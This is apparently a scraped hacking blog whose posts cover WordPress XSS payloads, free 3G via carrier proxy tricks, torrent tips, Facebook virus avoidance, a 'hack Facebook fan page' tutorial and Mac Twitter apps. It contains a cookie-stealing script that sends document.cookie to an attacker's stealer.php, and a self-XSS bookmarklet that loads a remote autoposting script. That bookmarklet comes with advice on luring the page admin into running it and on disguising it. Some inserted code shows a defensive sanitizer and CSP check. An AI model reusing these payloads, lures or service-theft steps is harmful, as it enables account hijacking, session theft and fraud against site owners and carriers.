False Alarm: XSS Vulnerability in WordPress 3.2.1

Dear Friends,

My earlier post about the XSS vulnerability in WordPress 3.2.1 turned out to be a false alarm. WordPress allows privileged users to post comments without filtering the HTML tags, but for a normal, underprivileged user it filters the tags. The difference is the unfiltered_html capability: by default administrators and editors have it (on a multisite install only super admins do), and everyone else, including anonymous commenters, has their comment HTML run through the KSES allowlist filter, which strips script tags and event-handler attributes. If you would rather have every comment filtered regardless of role, add define('DISALLOW_UNFILTERED_HTML', true); to wp-config.php, which takes the capability away from all users. I am sorry for the inconvenience. My intention was to make you all aware of this vulnerability so that you could save your blog from being hacked.

But now I am glad that WordPress is safe. :)

XSS Injection Vulnerability in WordPress 3.2.1

Update: It will work only if you are logged in. Sorry for the false alarm. My intention was to alert bloggers so that they could safeguard their blogs. For more details, see the False Alarm post above.

Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version, 3.2.1, of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to a stored XSS attack which lets users inject malicious JavaScript because the comment field is not sanitized. Without discussing much about what this vulnerability could do to your blog, I will jump to how it works and the solution.

How does it work?

Inject one of the payloads below into the comment field of the target, or use your brain to build a more powerful injection.

Popup "alert" box:
<script>alert('hungry-hackers.com')</script>

Redirect to www.hungry-hackers.com:
<script>document.location="http://hungry-hackers.com"</script>

Cookie stealer (needs a logging script such as stealer.php on your server to record the cookie; the cookie is sent through an image request so that the redirect which follows does not cancel it):
<script>new Image().src="http://your-domain/stealer.php?cookie="+encodeURIComponent(document.cookie);document.location="http://the-site-you-are-stealing-from.com"</script>

Solution:

Upgrade to the latest version when it becomes available. In the meantime, disable comments or hold all comments for moderation, as I did ;)
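What separates the two code paths, as an added example that is not WordPress's own code (that lives in wp-includes/kses.php): a small KSES-style allowlist filter for comment HTML which is skipped for users holding the unfiltered_html capability, run over the payloads above plus two common bypass attempts (an event-handler attribute, a javascript: href and a nested tag). The tag and attribute allowlist and the user objects are assumptions for the demo.

```javascript
// Added example, not WordPress's own code: a KSES-style allowlist filter for
// comment HTML, skipped for users who hold the unfiltered_html capability.
// Tag/attribute allowlist and user objects are assumptions for the demo.
const ALLOWED = new Map([
  ["a", ["href", "title"]], ["b", []], ["strong", []], ["i", []], ["em", []],
  ["code", []], ["blockquote", []], ["p", []], ["br", []],
]);
// href must literally start with http(s)://, mailto:, "/" or "#"; this rejects
// javascript:, data:, vbscript: and entity-encoded variants such as &#106;avascript:.
const SAFE_HREF = /^(?:https?:\/\/|mailto:|\/|#)/i;

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// One well-formed tag at the start of the string: <name attr="v" attr2='v' attr3=v>
const TAG_RE = /^<(\/?)([a-z][a-z0-9]*)((?:\s+[a-z][a-z0-9-]*(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/i;
const ATTR_RE = /([a-z][a-z0-9-]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;

// Allowlist filter: anything that is not a well-formed, allowed tag is emitted
// as escaped text, so broken or nested tags (<scr<script>ipt>) cannot survive.
function sanitize(html) {
  let out = "";
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<") { out += escapeHtml(html[i]); i++; continue; }
    const m = TAG_RE.exec(html.slice(i));
    const name = m && m[2].toLowerCase();
    if (!m || !ALLOWED.has(name)) { out += "&lt;"; i++; continue; }
    i += m[0].length;
    if (m[1]) { out += `</${name}>`; continue; }
    let tag = `<${name}`;
    for (const a of m[3].matchAll(ATTR_RE)) {
      const key = a[1].toLowerCase();
      if (!ALLOWED.get(name).includes(key)) continue;   // drops onclick, style, src, ...
      const val = (a[2] ?? a[3] ?? a[4] ?? "").trim();
      if (key === "href" && !SAFE_HREF.test(val)) continue;
      tag += ` ${key}="${escapeHtml(val)}"`;
    }
    out += tag + ">";
  }
  return out;
}

// Mirrors the WordPress decision: unfiltered_html bypasses the filter entirely.
function renderComment(text, user) {
  return user.caps.includes("unfiltered_html") ? text : sanitize(text);
}

// Constructed inputs: the page's payloads plus two bypass attempts.
const PAYLOADS = [
  "<script>alert('hungry-hackers.com')</script>",
  "<script>document.location=\"http://hungry-hackers.com\"</script>",
  "<a href=\"javascript:alert(1)\" onclick=\"alert(1)\">click</a>",
  "<b onmouseover=\"alert(1)\">bold</b> <scr<script>ipt>alert(1)</script>",
];
const subscriber = { caps: ["read"] };                 // assumed role objects
const editor = { caps: ["read", "unfiltered_html"] };

for (const p of PAYLOADS) {
  console.log("subscriber:", renderComment(p, subscriber));
  console.log("editor:    ", renderComment(p, editor));
}
```

Run it with node. The allowlist approach matters more than the specific tags: anything that is not a well-formed tag on the list is turned back into text rather than removed, so partial or nested tags cannot reassemble into a script element after filtering, while the editor path returns the payload untouched, which is exactly what a logged-in test of the "vulnerability" observes.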


Free Unlimited 3G Service on Tata Docomo

Hello Friends,

Are you tired of using the slow 2G service? I know your answer is 'YES'. We all want to lay our hands on the latest high-speed 3G service, which gives a download speed of 500 kbps to 1000 kbps. Today I will show a trick with which you can use unlimited 3G service for free.

Requirements

  1. Tata Docomo SIM Card with a balance of more than Rs. 1
  2. 3G enabled cellphone

Steps

  1. Create a new access point using the configuration below and restart your cellphone.
    • Name : Tata Docomo or any
    • Access Point (APN) : tata.docomo.dive.in
    • Homepage : www.google.com or any
    • Proxy : 202.87.41.147
    • Proxy Port : 8080
    • Username : leave blank
    • Password : leave blank
  2. Download the Opera Mini 4.2 handler browser.
  3. Open your Opera Mini handler and make the following changes in the Settings:
    • Set the Divein settings as the default settings for Opera Mini
    • Set http in the Custom field of your Opera Mini handler
    • Set the Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
    • Leave the Proxy Type blank (don't enter anything in the Proxy Server field)
  4. Done!! Now use your free unlimited 3G service. Enjoy!!

Tips to get Maximum Performance from your P2P Software

Hello Friends,

We all love torrents because they are free. In the last few weeks I have been downloading a lot of movies and software from torrents. While messing with the torrents I found a few things which turned out to be very fruitful. Today I will show you how to use those tricks to get maximum performance from your P2P software.

Note: I use uTorrent, so all of the following hacks have been tested on the latest version of uTorrent only. You may test them on other P2P software and let us know about your experience.


6 Tips to Avoid Facebook Viruses and Spam Messages

Facebook, the biggest social network with 500 million users, provides an interface for hitting an unsuspecting crowd with malware and viruses. These viruses aren't very difficult to detect if you are cautious enough. They appear on your wall in the form of bizarre or eye-catching stories and videos, and once you have clicked or liked the link it is already too late. The next step would be getting rid of the virus, which is a time-consuming process. It's better to avoid spam messages and trojans in the first place.

How to avoid it?

1. Think before you act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment's thought. If a post sounds a bit over the top, like a headline out of a tabloid, that is your first warning sign.

2. Avoid links and videos with catchy phrases like "funniest ever", "most hilarious video on Facebook" or "you've got to see this". Search for the phrase to see whether the post in question comes up in a search engine alongside information about a current virus or trojan.

3. Check who posted the suspicious content. If you receive a message from someone you do not know, that is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven't talked to in a while. Unfortunately, it is likely that this friend has already fallen victim to the latest virus: after they clicked on the story themselves, the message was sent out to all of their friends as well.

4. Be wary of messages that have been posted by multiple users, since the virus spreads among your less cautious friends. If a link with a title such as "Sexiest video ever" shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), that is another warning sign. Similar direct messages are a likely variant of the notorious Koobface worm, which has used this approach in the past.

5. Do not fall for the "typical" money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Not everything can be screened before posting, so money-transfer scams and hoax applications still find their way onto Facebook. You should also avoid applications that claim to do a full "error check" or fix security problems with your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it is too late and you have already been infected, removal may be painless if a good anti-virus program catches the virus, trojan or other malware early on.

What’s Next?

These were a few important tips to safeguard your Facebook account, but your job isn't done yet. Once you have determined that a link or post on your Facebook wall is malicious, mark it as spam so that Facebook support can stop it from spreading further and infecting other users.

If you have ever fallen victim to such a malicious scheme, please share your experience with all the users in the comments so that others don't fall victim to it.

How to Hack Facebook Fan Page

Today I will show you how to hack a Facebook fan page. This is my first post at Hacking Truths and I am very excited about it. I hope you like this tutorial and give your feedback in the comments.

Now let's start the tutorial. First of all we will need to set up an exploit and a website to host it. If you already have hosting, great; otherwise there are a couple of free hosting websites that can be used for such purposes. I will tell you about them along the way.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

1. Download the exploit from this Link.

2. After downloading it, you need to edit it. Get Notepad++, one of my favourite editors. You can download it from here.

3. Open the file named pagehack.js with Notepad++. Find the text wamiqali@hungry-hackers.com (Ctrl+F) and replace it with the email address you used when signing up for Facebook.

4. Now change the viral text that will be sent to the victim's friends. Find the text Hey See what i got! and replace it with your own text. This text will be posted to the Facebook walls of 15 of the victim's friends. Since it is an autoposting bot, I reduced its capacity to 15 to keep Facebook from blocking it. Save it as anything.js (Tip: be a social engineer and rename it to something more attractive like getprizes.js or booster.js).

5. Upload this script to your server. Make an account at 0fess.net or 000webhost.com (t35 or 110mb won't help this time), then use FileZilla to upload the file to your web root. The address of your script will then be:

www.yoursite.0fess.net/booster.js

6. Now comes the most important part of this hack. You need to convince the admin of the fan page to paste the following code into the browser's address bar (replace the script address with your own) and hit Enter while logged in to Facebook. This is self-XSS: the script runs with the admin's session only because the admin executes it themselves, and browsers now strip the javascript: prefix from text pasted into the address bar to block exactly this.

javascript:(a = (b = document).createElement("script")).src = "//www.yoursite.0fess.net/booster.js", b.body.appendChild(a); void(0)

Tip: You can fool him by making him greedy to grab something. You can also encode the script (for example as character codes) to disguise it.
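The step that actually fetches booster.js is the one a site can refuse, as an added example that is not part of the original post: browsers apply a Content-Security-Policy script-src directive to dynamically inserted script elements too, so if the page's policy does not list the attacker's host the appended script never loads, whatever the admin pasted. The function below parses a CSP header and decides whether one script src would be allowed on one page; the policies and the page URL are hypothetical, and keyword sources other than 'self' are treated as never admitting a remote host.

```javascript
// Added example, not from the original post: checks whether a page's
// Content-Security-Policy lets the bookmarklet's injected <script src> load.
// Policy strings and page URL below are hypothetical; real sites' policies differ.

// Does one CSP source expression ('self', https:, *.0fess.net, https://cdn.example ...)
// match the resolved script URL? Simplified: keyword sources other than 'self'
// ('none', 'unsafe-inline', 'nonce-...', 'sha256-...', 'strict-dynamic') never
// admit an arbitrary remote host, and explicit default ports are not normalised.
function sourceMatches(expr, url, pageOrigin) {
  if (expr === "'self'") return url.origin === pageOrigin;
  if (expr.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return url.protocol === expr.toLowerCase(); // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\s/:]+)(?::(\d+|\*))?(\/\S*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const pageScheme = new URL(pageOrigin).protocol;
  // A scheme-less host-source inherits the page's scheme; https is always acceptable.
  const schemeOk = scheme
    ? url.protocol === scheme.toLowerCase() + ":"
    : url.protocol === pageScheme || url.protocol === "https:";
  const h = host.toLowerCase();
  const hostOk = h === "*" ||
    (h.startsWith("*.") ? url.hostname.endsWith(h.slice(1)) : url.hostname === h);
  const portOk = port === "*" || (port ?? "") === url.port;
  const pathOk = !path ||
    (path.endsWith("/") ? url.pathname.startsWith(path) : url.pathname === path);
  return schemeOk && hostOk && portOk && pathOk;
}

// Parse the header into directives and decide for one script src on one page.
function scriptAllowed(csp, scriptSrc, pageUrl) {
  const url = new URL(scriptSrc, pageUrl);            // resolves the "//host/..." form
  const pageOrigin = new URL(pageUrl).origin;
  const directives = new Map(
    csp.split(";").map((d) => d.trim()).filter(Boolean).map((d) => {
      const [name, ...sources] = d.split(/\s+/);
      return [name.toLowerCase(), sources];
    })
  );
  // script-src falls back to default-src; with neither present nothing is restricted.
  const sources = directives.get("script-src") ?? directives.get("default-src");
  if (!sources) return true;
  return sources.some((s) => sourceMatches(s, url, pageOrigin));
}

// Constructed scenario: the bookmarklet's src from step 6 on a hypothetical page.
const PAGE = "https://www.example.com/pages/123";
const INJECTED = "//www.yoursite.0fess.net/booster.js";
const POLICIES = [
  "",                                                                   // no CSP: loads
  "default-src 'self'; script-src 'self' https://static.example-cdn.net", // blocked
  "script-src 'self' *.0fess.net",                                      // lists the attacker's host
  "script-src https:",                                                  // any https origin: loads
  "default-src 'none'",                                                 // blocked
];
for (const p of POLICIES) {
  console.log(JSON.stringify(p), "->", scriptAllowed(p, INJECTED, PAGE));
}
```

The second policy is the interesting one for a page admin: the injected script is refused without touching the bookmarklet itself, which is why the free-hosting step is the weak link of this technique once a target deploys a script-src allowlist.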

About the author:

Wamiq Ali is a tech lover and a hacker; this is his first post at hungry-hackers. Linux is one of his favourite platforms. He blogs at www.hackersthirst.com.



9 Best Twitter Desktop Apps for Mac

Hello Friends,

The popularity of Twitter has increased tremendously in the past few years. As a result, a lot of Twitter desktop applications are available for download these days. These applications allow you to receive and post tweets from your desktop without visiting your Twitter.com page. To reduce the burden of finding the right app for you from such a big pool, we have compiled a list of the best Twitter desktop apps available. Earlier I compiled a list of 20 Best Twitter Desktop Apps for Windows. Today I give you 9 Best Twitter Apps for Mac.

1. EventBox

This just-for-Mac app is a favorite of many because it supports Twitter, Facebook and Flickr integration, feed reading with Google Reader, and internet trend watching with Reddit and Digg. Keyboard shortcuts, hotkeys, Instapaper integration, and photo uploads to Flickr and Facebook make EventBox pretty nifty. It's also got a very slick interface with a navigation menu on the left-hand side.

2. Mac Lounge

This app is incredibly appealing for its dead simple, single column interface and respectable feature set. We, of course, love the multiple account support, but also appreciate saved searches, quick access to view followers and following, and tweet options to link to tweet, copy tweet, or copy tweet URL. There’s also an accompanying iPhone app, which syncs with the desktop version and greatly improves the app’s relevance.

3. Nambu

This really sophisticated Mac app should be more than enough for any and all of your Twitter needs. You've got access to your followers and friends, custom groups, search (integrated with FriendFeed and OneRiot), trends, tr.im and pic.im integration, multiple accounts, Ping.fm integration, filters, and three view options for a one- or many-column view of tweets.

4. Sideline

Sideline is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.

5. Skimmer

It's hard not to love this app. Not only is it beautiful to look at, but it also tracks your favorite social sites. Skimmer is certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.

6. Tweetie

A full-featured Twitter client which is available in free ad-supported and paid ad-free versions. This desktop app lets you view not only a tweet but also the entire conversation history leading to it. It provides independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend on Twitter. Other features include threaded DMs, user details, torn-off searches, a bookmarklet, and preferences.

7. Twibble Desktop

Twibble is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.

8. Twitterrific

Lets you both read and publish posts or "tweets" using a clean and concise user interface designed to take up a minimum of real estate on your Mac's desktop. The app shows a scrolling list of the latest tweets from your friends or from public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, a count of unread tweets, quick deletion of tweets, auto show/hide of new tweets, single-click access to user pages and more.

9. TwitterPod

This app isn't known for its sophistication or advanced Twitter functionality. TwitterPod is a basic single-column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fanboys and fangirls may still be using it for their tweeting.